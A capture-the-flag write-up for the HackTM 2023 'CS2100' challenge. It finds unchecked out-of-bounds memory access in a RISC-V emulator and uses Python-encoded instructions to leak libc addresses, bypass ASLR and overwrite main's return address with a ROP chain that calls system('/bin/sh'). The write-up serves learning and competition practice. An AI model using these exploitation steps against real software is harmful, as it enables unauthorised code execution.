HackTM CTF Quals 2023: (CS2100) ·

Table of Contents

Overview #

This was an interesting CTF that took place between 18th and 19th Feb, 2023. I actually solved the challenge way after the CTF was over, therefore (tl;dr) the following are the steps that I would have taken during the CTF to solve the challenge.

The following was the description of the provided challenge:

To all my CS2100 Computer Organisation students, I hope you've enjoyed the lectures thus far on RISC-V assembly.
 
I have set-up an online service for you to test your own RISC-V code!
Simply connect to the service through tcp:

nc 34.141.16.87 10000

Credit: Thanks to `@fmash16` for his emulator! I didn't even have to compile the emulator binary myself :O https://github.com/fmash16/riscv_emulator/blob/main/main

Initial Analysis #

The challenge provided a zip file for download that had the challenge files. These files can be downloaded from here attachment.zip

The challenge binary file provided was called main and checking the protections enabled using the checksec command, all exploit mitgations protections are enabled.

checksec ./main
[*] '/home/kali/Desktop/CTFs/23/HackTM/Pwn/CS2100/chal/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

From the description and from the provided repo this challenge seems to be a VM that is used to emulate RISC-V instructions. It also turns out that the provided challenge binary file is a compiled version of the repo.

For a quick description, RISC-V is an ISA that uses a load and store architecture and the base instructions set has a fixed length of 32-bit aligned instructions, the different registers and architecture design can be found here.

Since this was a VM based challenge, I decide to look for Out-of-Bounds (OOB) vulnerabilities, this was just a hunch coming from earlier writeups that I read based on challenges that had the same bug.

Source Code Review #

From the github repo provided, we can access the source code, this really reduced the hustle of decompling/reversing the binary. As briefly mentioned above, RISC_V applies the load and store architecture. So the key to finding the vulnerablity is to look at instructions that implement these loads and stores.

You can clone the repo to easily review the source-code from you’re favourite editor. Most of the interesting code is at the src/cpu.c. Skimming through the code, a CPU object with registers and a program counter is initialized.

From here, there are interesting functions like exec_LN where (N) is used to specifty the size that could either be a Byte, Half Word, Word or a Double. These functions perform some sort of store since they call the cpu_load function.

For example the exec_LD function is as follows:

// This function queries some registers and calls cpu_load

void exec_LB(CPU* cpu, uint32_t inst) {
    // load 1 byte to rd from address in rs1
    uint64_t imm = imm_I(inst);
    uint64_t addr = cpu->regs[rs1(inst)] + (int64_t) imm;
    cpu->regs[rd(inst)] = (int64_t)(int8_t) cpu_load(cpu, addr, 8);
    print_op("lb\n");
}

// CPU load further calls bus_load
uint64_t cpu_load(CPU* cpu, uint64_t addr, uint64_t size) {
    return bus_load(&(cpu->bus), addr, size);
}

//bus load calls dram_load
uint64_t bus_load(BUS* bus, uint64_t addr, uint64_t size) {
    return dram_load(&(bus->dram), addr, size);
}

//dram load (vulnerable code) 
uint64_t dram_load_8(DRAM* dram, uint64_t addr){
    return (uint64_t) dram->mem[addr - DRAM_BASE];
}

From the dram_load_n source code snippet above, there is clearly an OOB Read vulnerability. This is because an attacker can read beyond the array buffer since there are no bounds checks to check if addr exceeds its limits; moreover the attacker has control over this value. This array is intialized with the DRAM_SIZE value as shown from the following source code snippet.

#define DRAM_SIZE 1024*1024*1
#define DRAM_BASE 0x80000000

typedef struct DRAM {
	uint8_t mem[DRAM_SIZE];     // Dram memory of DRAM_SIZE
} DRAM;

The maximum size of the array is 0x100000, therefore if we pass a value for example 0x80100010 as the addr, the size passed to the array will be 0x100010 and therefore we will be reading 0x10 bytes outside leading to a OOBR bug.

The same applies to the store set of instruction(s) that do not perform any bounds check therefore introducing an OOBW bug.

Exploitation Strategy #

Before weaponizing our exploit, we need to understand how the VM works. From its source code main.c, the application requires a file passed as its command line argument in this case a bin file. The size of the file is then determined and the contents of the file are copied to memory. Using a loop, based on specified instructions read from the file, the cpu_execute will implement these as RISC-V instructions.


int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: rvemu <filename>\n");
        exit(1);
    }

    // Initialize cpu, registers and program counter
    struct CPU cpu;
    cpu_init(&cpu);
    // Read input file
    read_file(&cpu, argv[1]);

    // cpu loop
    while (1) {
        // fetch
        uint32_t inst = cpu_fetch(&cpu);
        // Increment the program counter
        cpu.pc += 4;
        // execute
        if (!cpu_execute(&cpu, inst))
            break;

        dump_registers(&cpu);

        if(cpu.pc==0)
            break;
    }

The cpu_execute implementation from the src/cpu.c is a follows:


int cpu_execute(CPU *cpu, uint32_t inst) {
    int opcode = inst & 0x7f;           // opcode in bits 6..0
    int funct3 = (inst >> 12) & 0x7;    // funct3 in bits 14..12
    int funct7 = (inst >> 25) & 0x7f;   // funct7 in bits 31..25

    cpu->regs[0] = 0;                   // x0 hardwired to 0 at each cycle

    /*printf("%s\n%#.8lx -> Inst: %#.8x <OpCode: %#.2x, funct3:%#x, funct7:%#x> %s",*/
            /*ANSI_YELLOW, cpu->pc-4, inst, opcode, funct3, funct7, ANSI_RESET); // DEBUG*/
    printf("%s\n%#.8lx -> %s", ANSI_YELLOW, cpu->pc-4, ANSI_RESET); // DEBUG

    switch (opcode) {
        case LUI:   exec_LUI(cpu, inst); break;
        case AUIPC: exec_AUIPC(cpu, inst); break;

What this does is that is basically does some logical operations on the instructions written to the file to determine the opcode, func3, funct7, rd, rs1, rs2 and the imm values. Based on the opcode, certain instructions are emulated.

Using a simple python script, we will write these instructions into a bin file, to basically implement an exec_ADDI instruction for POC. This should basically ADD two values and store the result to a register.

void exec_ADDI(CPU* cpu, uint32_t inst) {
    uint64_t imm = imm_I(inst);
    cpu->regs[rd(inst)] = cpu->regs[rs1(inst)] + (int64_t) imm;
    print_op("addi\n");
}

From the src/cpu.c, this instruction is only implemented when the opcode is I_TYPE (0x13) and the value of funct3 is 0x0 from include/opcodes.h. Using a simple python script as shown below, we will try to re-produce values that will implement this instruction.


from pwn import *

#opcodes
I_TYPE = 0x13
ADD = 0x0

# Registers 
A0 = 10
SP = 0x2


def init(opcode, funct3=0, funct7=0, rd=0, rs1=0, rs2=0):
	inst = 0
	inst |= (opcode & 0x7f)
	inst |= (funct3 & 0x7) << 12
	inst |= (funct7 & 0x7f) << 25
	inst |= (rs1 & 0x1f) << 15
	inst |= (rs2 & 0x1f) << 20
	inst |= (rd & 0x1f) << 7
	
	return inst


def exec_ADDI(opcode=I_TYPE, funct3=ADD, funct7=0, rd=0, rs1=0, rs2=0, imm=0):
	inst = init(opcode, funct3, funct7, rd, rs1, rs2)	
	inst |= (imm & 0xfff) << 20
	return inst

def main():
	payload = flat([
		exec_ADDI(rd=A0,rs1=SP, imm=2),
	])
	with open("file.bin", "wb") as fp: fp.write(payload)

if __name__ == "__main__":
	main()

The above python script will write the instructions used to emulate an exec_ADDI RISC-V instruction intofile.bin. When these instructions are executed, this will add the value in the SP register passed to rs1 which was 0x80100000 with 2 and the result which is expected to be 0x80100002 will be stored in the A0 register.

Currently, we have not idea what is beyond the bounds of the array and where it is located. This can be a location on the stack that can allow us to control EIP or an mmaped location in libc that can allow us to overwrite a libc pointer e.g __malloc_hook. Using the OOBW vulnerability, we will write a value slight beyond the array and use the debugger to find this value in memory.

Using the exec_ADDI instruction and an exec_SLLI to shift this value, we will store the value 0x42424242 into one of RISC-V’s registers that will be followed by a store that will write this value beyond the array at mem[sp+0x4]. This can be done from the following python source code snippet.


def main():
        payload = flat([
        exec_ADDI(rd=A0,rs1=A0, imm=0x424),
        exec_SLLI(rd=A0, rs1=A0, imm=12),
        exec_ADDI(rd=A0, rs1=A0, imm=0x242),
        exec_SLLI(rd=A0, rs1=A0, imm=0x8),
        exec_ADDI(rd=A0, rs1=A0, imm=0x42),
        exec_SD(rs1=SP, rs2=A0, imm=0x4), #trigger OOBW
        ])
        with open("file.bin", "wb") as fp: fp.write(payload)

Notice that since the SP register already has the value 0x80100000, passing 0x4 into imm will write the value from the A0 register leading to a Out-Of-Bounds by 0x4 bytes.

When I ran the executable and passed the file.bin file that was generated from the above python script, I received a Stack Smashing Detected error.

This was therefore an indicator that the mem array was indeed on the stack and since this was initialized in the main() function, it particulary might be overwriting the stack canary on main’s stack. This can therefore be better visualized from the debugger. Load the emulaator into the debugger and set a break-point in the main function right before the __stack_canary check at br *main + 218.

When the break-point it hit and the stack where the canary is placed at rbp - 0x8 is examined, indeed the canary is overwritten with the lower 4 bytes from the arbitrary value we wrote earlier.

The stack canary on the stack, is usually followed by RBP and finally the saved return, therefore by adjusting the value mem[sp+0x4], we can come to the following conclusion.

Stack Canary (mem[sp+0x8])
RBP (mem[sp+0x10])
Saved Return Address (mem[sp+0x18])

Weaponization #

We already know the location of the array in memory and its offset from the saved return address. An OOBR will be used to leak a libc address from the stack and since we are in main’s stack, its return address will most probaly be __libc_start_main_ret; with this address we can find the base address to libc and craft a ROP chain, to call system that will return a shell for code execution bypassing ASLR.

NOTE: Since RISC-V uses a load and store architecture, these address will therefore need to be written to specific ‘registers’ before being written into memory.

Leaking Addresses #

On the stack, the return address of main (save RIP) is at mem[sp+0x18] as previously identified. The return address of main is usually a libc address at __libc_start_main. This address can therefore be ’leaked’ by writing it into one of the VM’s registers.

The following python code snippet is used to leak this address and loads it into the A0 register.

exec_LD(rd=A0, rs1=2, imm=0x18)

From the debugger, (in my current machine), this address is an address at __libc_start_call_main+122. The address of __libc_start_main from the leaked address is leaked_address + 0x36.

Using the exec_ADDI instruction, we will add and subtract the above values and store the result in the same A0 register. The reson why we do not use an exec_SUB instruction, is because this does not exist as an instruction in RISC-IV. More can be read here

The following python code snippet can be used for this action.


exec_ADDI(rd=A0, rs1=A0, imm=0x36),

With the address of __libc_start_main leaked, we can now calculate the base address of libc, to be able to bypass ASLR. The exec_ADDI instruction, will then be used here again to subtract the value of libc.sym["__libc_start_main"] that is at 0x271c0.

From the source code, we cannot subtract the whole value 0x271c0 since exec_ADDI can only support 12-bit signed numbers. We therefore need to find a way to only subtract the 12-bit signed numbers and this can be done via a loop..First we need to subract 0xc0 to remain with 0x27100. A loop that loops 0x27100//0x100 times can therefore be used to subtract this value concurrently.

The following python code snippet can be used for this action.

exec_ADDI(rd=A1, rs1=A0, imm=-0xc0)

for _ in range(0x27100//0x100): payload += flat(exec_ADDI(rd=A1, rs1=A1, imm=0x100))

As shown below the based address of libc is returned and stored in the A1 register.

Return-Oriented-Programming Attack #

With the base address of libc, a rop attack can be chained for code execution. From the current libc of my machine the address of libc.sym['system'] was 0x4c330. This address was written to a chosen register in this case the A3 register using the following source code snippet.

NOTE: Remember the 12-bit signed integer limit on exec_ADDI.


exec_ADDI(rd=A2, rs1=A2, imm=0x4c3),
exec_SLLI(rd=A2, rs1=A2, imm=0x8)# >> 8
exec_ADDI(rd=A2, rs1=A2, imm=0x30)

With the address of libc.sym['system'] in one of the registers, this address can be added to the libc_base address and saved to a different ‘register’. This can be done using the exec_ADD instruction that add’s two values from ‘registers’.

exec_ADD(rd=A3, rs1=A1, rs2=A2)

As shown above, the address of system has been written to the A3 register. The rest of the addresses pop_rdi, ret, and the address of system were written to the A4, A5 and A6 respectively, with their absolute addresses written to S2, S3 and S4 respectively from the following python code snippet:

#binsh
exec_ADDI(rd=A4, rs1=A4, imm=0x196)
exec_SLLI(rd=A4, rs1=A4, imm=0xc)
exec_ADDI(rd=A4, rs1=A4, imm=0x031)

#pop_rdi
exec_ADDI(rd=A5, rs1=A5, imm=0x277)
exec_SLLI(rd=A5, rs1=A5, imm=0x8)
exec_ADDI(rd=A5, rs1=A5, imm=0x25)

#ret
exec_ADDI(rd=A6, rs1=A6, imm=0x270)
exec_SLLI(rd=A6, rs1=A6, imm=0x8)
exec_ADDI(rd=A6, rs1=A6, imm=0xc2)

These absolute libc addresses of the above gadgets can further be written into the S2, S3 and S4 register from the following python code snippet:


exec_ADD(rd=S2, rs1=A1, rs2=A4), # binsh
exec_ADD(rd=S3, rs1=A1, rs2=A5), # pop_rdi
exec_ADD(rd=S4, rs1=A1, rs2=A6), # ret

The OOBW vulnerability can now be used to overwrite the saved return address of main at mem[sp+0x18] with the above addresses in the ‘registers’. The rop chain should be in the following format:

pop_rdi Gadget + &binsh + ret gadget + &System().

The above gadgets were returned from libc with the return gagdget used to align the stack

These addresses can be written to main’s stack using the exec_SD instruction as follows:

#overwrite values on the stack
exec_SD(rs1=SP, rs2=S3, imm=24), # pop_rdi
exec_SD(rs1=SP, rs2=s2, imm=32), # &binsh
exec_SD(rs1=SP, rs2=S4, imm=40), # ret
exec_SD(rs1=SP, rs2=A3, imm=48), # &system

The above code snippet will overwrite the saved return address with the above rop chain, and when the application is run and the bin file is passed to it as its argument, this returns a shell for code execution as shown below:

The full exploit code can be found here exploit.py

Conclusion #

On the instance that was hosting the challenge, it prevented the spawning of a remote shell to read the a flag by redirecting stdin to /dev/null. This therefore required reading the flag directly, using /bin/cat flag, that could either be written to memory in one of the RISC-V registers and passed to system() or execve().